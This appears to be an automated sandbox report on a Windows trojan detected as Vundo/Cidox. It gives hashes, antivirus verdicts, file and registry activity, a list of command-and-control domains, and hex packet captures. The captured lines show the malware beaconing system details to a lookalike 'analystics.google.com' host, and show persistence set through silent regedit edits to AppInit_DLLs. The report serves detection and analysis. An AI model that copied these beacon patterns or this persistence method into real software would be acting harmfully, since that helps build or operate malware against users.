Analysis Date2015-01-21 21:43:52
MD565470543de3449e490192c12bad9ecf9
SHA100cc238e8a22ba1ead0b53a5b09cf69158d60a2f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: b3092bbbbc1789e54ab4a958f96b32ea sha1: 35bc1238d3b62889ea79bf0a136e36d016cf3307 size: 27136
Section.rdata md5: 4c1d41b236698b3965e7a0d564cc9f81 sha1: f80448a15196acddbb1a7b1b4dd707b392b4f2e5 size: 7168
Section.data md5: 709ffafe4732e0260ba7e99826524d0d sha1: 31fe46801e552144211e26cdc2a5a2674bd2dce0 size: 5120
Section.rsrc md5: cb2914af20ddc394fff115643c22f091 sha1: f7ad8276604ddd3d2d189dd5caa1df247c9b2c67 size: 138752
Timestamp2012-11-26 18:42:06
PackerMicrosoft Visual C++ ?.?
PEhash6f4555e3fc85af53ec3a7e04fcfdf75b575a4534
IMPhash7d0ae75d91afac4dfabb6e18247ab840
AV360 Safeno_virus
AVAd-AwareGen:Variant.Symmi.6801
AVAlwil (avast)Crypt-OXO [Trj]
AVArcabit (arcavir)Gen:Variant.Symmi.6801
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Drop.Vundo.voua
AVBullGuardGen:Variant.Symmi.6801
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. WebTrojan.DownLoader7.31368
AVEmsisoftGen:Variant.Symmi.6801
AVEset (nod32)Win32/Kryptik.APMA
AVFortinetW32/Kryptik.FAGX!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Symmi.6801
AVGrisoft (avg)Win32/Cryptor
AVIkarusTrojan-Dropper.Win32.Vundo
AVK7Backdoor ( 04c501871 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Inject
AVMcafeeRDN/Vundo!dw
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Symmi.6801
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)Backdoor.Cidox

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates FileC:\WINDOWS\system32\mucltei.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSdetoxist.com
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSgauldneza.com
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSnetrovad.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\mucltei.dll\\x00

Network Details:

DNSdetoxist.com
Type: A
209.222.14.3
DNSdebijonda.com
Type: A
209.99.40.223
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
209.222.14.3
DNSvornedix.com
Type: A
209.222.14.3
DNSdentagod.com
Type: A
209.222.14.3
DNSliteworns.com
Type: A
209.222.14.3
DNSvengibit.com
Type: A
209.222.14.3
DNStryangets.com
Type: A
209.222.14.3
DNSgauldneza.com
Type: A
DNSgetinball.com
Type: A
DNSgetintsu.com
Type: A
DNSgetavodes.com
Type: A
DNStryatdns.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSinzavora.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFrIkIHHDVCL3
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFnMwNoblY3Hp
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFrpp3jqwMT/5
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFrpp3jqwMT/5
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFk626MbrXfDX
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFk626MbrXfDX
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFubmo7K/tdsV
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFsEvF/o+ZPyi
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFsEvF/o+ZPyi
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=228&av=0&vm=0&al=0&p=741&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygxtw9vD0NvaDlO9dRI0Spmadup58dUyKFoYbK6VNHRRi
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1032 ➝ 209.99.40.223:80
Flows TCP192.168.1.1:1033 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1035 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1036 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1037 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1038 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1039 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1040 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b467249 6b494848 4456434c 33204854   KFrIkIHHDVCL3 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b466e4d 774e6f62 6c593348 70204854   KFnMwNoblY3Hp HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b467270 70336a71 774d542f 35204854   KFrpp3jqwMT/5 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b467270 70336a71 774d542f 35204854   KFrpp3jqwMT/5 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b466b36 32364d62 72586644 58204854   KFk626MbrXfDX HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b466b36 32364d62 72586644 58204854   KFk626MbrXfDX HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b467562 6d6f374b 2f746473 56204854   KFubmo7K/tdsV HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b467345 76462f6f 2b5a5079 69204854   KFsEvF/o+ZPyi HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b467345 76462f6f 2b5a5079 69204854   KFsEvF/o+ZPyi HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 32382661   XX0000&key=228&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343126 6f733d35 2e312e32 3630302e   741&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677874 77397644 304e7661 446c4f39   ygxtw9vD0NvaDlO9
0x000000b0 (00176)   64524930 53706d61 64757035 38645579   dRI0Spmadup58dUy
0x000000c0 (00192)   4b466f59 624b3656 4e485252 69204854   KFoYbK6VNHRRi HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....


Strings
P.rsrcVuritorlatratce
\
.CC
 
..
.
h
.
...

041904E3
68y{3
7.12.26.3
BINARY	COPYRIGHT
                                 H
         (((((                  H
         h((((                  H
Internal
Internal.exe
kernel32.dll
KERNEL32.DLL
leDescription
MAINACC	SLIPUPACC
mpanyName
mscoree.dll
MS Shell Dlg
NPENCODINGDIALOG
nternal.exe
oICON1
ProductVersion
ringFileInfo
Translation
VarFileInfo
_VERSION_INFO
VuXl
                          
! ,$&&'
&*$#$$#$*
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0FlSG\|
0F~RU]n
0~K=_&
0SSSSS
.111,,,@Tf
1Fhr[mjXS
|1m-Rg
1tcRCs,
1_U^"s
2a!UqE
2G1S6\
2G4SW\l
2GdTW\`
2GqSW\z
2G.Sa\\
2G\sw|L
2G|SW\l
2G|SW\m
2~hbrq_^P3-.
2tH65Py
3G|SW\l
[(3ha<
:3p'G(x
\3r0Am
~3RE,z+,
>3zZ26
4bbbUTK
4c~Zx{B7
4`	kZ	
4N4ovW
~||{4ncTK
4TTTTTAWK-
4@uTQ[i
4ypmAbp
 }^5,)
5bH@cxd
5CxWSXh
5lCGL|
`5vU|#
5=*Z)U
62+cx$
6f?(,y@_2
6I-*K;"
6MFIU=z
6OU{xt8
6o=W`D
6sG}SW\
6tYquiR
78;4O`
7BJShz
	7S{=:F
8877666.,,,&&&1TU
8#A'B`Y
8f3 \J
8I'{0Cs
8JD^z~\b
8^l1:9
8^Z^znBb
')97a<i<W
999877766mv.,0A@UTTTU
9e3@0H
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
AH[qzz
AIH$+#
An application has made an attempt to load the C runtime library incorrectly.
ANZ[LdM
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
aueHb:u
August
aUM>CUlO
a	UyF7B
AW)cGl:
>AyU=[y
b*}2Us*
<bDgQu@
BLA'O?
?BqVZYa
^b@UIq
Bw~CGL
bWEcgl
bWGL'l\
`)BWsM
c222gL
C:)4glD
'cCTnhY
CMGGPc
CorExitProcess
credui.dll
CredUIParseUserNameA
- CRT not initialized
cy$Z`NZ
`.data
@.data
DDD.;;;11ATW
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
D]h@MMM)MMM
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
d)\K.G|
d*m.C5|k;
DOMAIN error
dsnJ\kR' 
E466,>
eC8>=Pb
Ef4_2w
!eiBSIZ
EIfBbJ
EncodePointer
EnterCriticalSection
e	RLc>
ExitProcess
e"xKT$
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
ezst^(a6@@j
February
FFEEEDD
ffffffff
ffffffffffff`
FG\S#\
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
f/rC,a
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
F*}sL&
fSSPa45
FW]sg	pQ
>f~Z\~B7,
F_>ZdU
:g5&_Lc
GBP_TR$&
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserDefaultLangID
GetUserObjectInformationA
GetVersion
/GGGHITf
]gh5^8W
gl4v!9q-
"GlSG\|
goftware). 
~GOSe\B
G; pub
gQccUN
G=qj=x
gRa``]]z
gwwwwwwwwwwww`wwww
g\X/XaJ@
"?Hbgl4-_)
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
.{&hH&x
(hTNj Lr
%h$ZTR[
'igakd4
,+.I]K6
$_InbjV
InitializeCriticalSectionAndSpinCount
